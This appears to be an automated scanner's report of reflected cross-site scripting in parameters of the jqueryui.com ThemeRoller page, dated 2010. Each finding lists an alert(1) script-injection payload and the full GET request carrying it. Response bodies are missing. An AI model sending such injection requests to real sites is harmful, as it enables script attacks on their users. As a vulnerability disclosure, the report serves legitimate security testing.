HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd3b"><script>alert(1)</script>ad29cf7f0db was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85bdd3b"><script>alert(1)</script>ad29cf7f0db&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11622"><script>alert(1)</script>2a8698a89ee was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9511622"><script>alert(1)</script>2a8698a89ee&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b0"><script>alert(1)</script>c470df28bbc was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55803b0"><script>alert(1)</script>c470df28bbc&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93d9"><script>alert(1)</script>d8f0585ac03 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c93d9"><script>alert(1)</script>d8f0585ac03&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2f63"><script>alert(1)</script>a1fb44a8ffa was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75a2f63"><script>alert(1)</script>a1fb44a8ffa&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f060"><script>alert(1)</script>f4d625fbe8f was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=05f060"><script>alert(1)</script>f4d625fbe8f&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:10:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7ccc"><script>alert(1)</script>1d5996565c3 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0f7ccc"><script>alert(1)</script>1d5996565c3&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:10:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420d7"><script>alert(1)</script>43bc00d2166 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png420d7"><script>alert(1)</script>43bc00d2166&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd29c"><script>alert(1)</script>6b56a51ca68 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.pngfd29c"><script>alert(1)</script>6b56a51ca68&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88bc"><script>alert(1)</script>371ad7ef019 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.pnga88bc"><script>alert(1)</script>371ad7ef019&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80133"><script>alert(1)</script>785ff6f694b was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png80133"><script>alert(1)</script>785ff6f694b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbe4"><script>alert(1)</script>0b3844709c3 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png6cbe4"><script>alert(1)</script>0b3844709c3&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1deb"><script>alert(1)</script>8320d1e8237 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngc1deb"><script>alert(1)</script>8320d1e8237&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
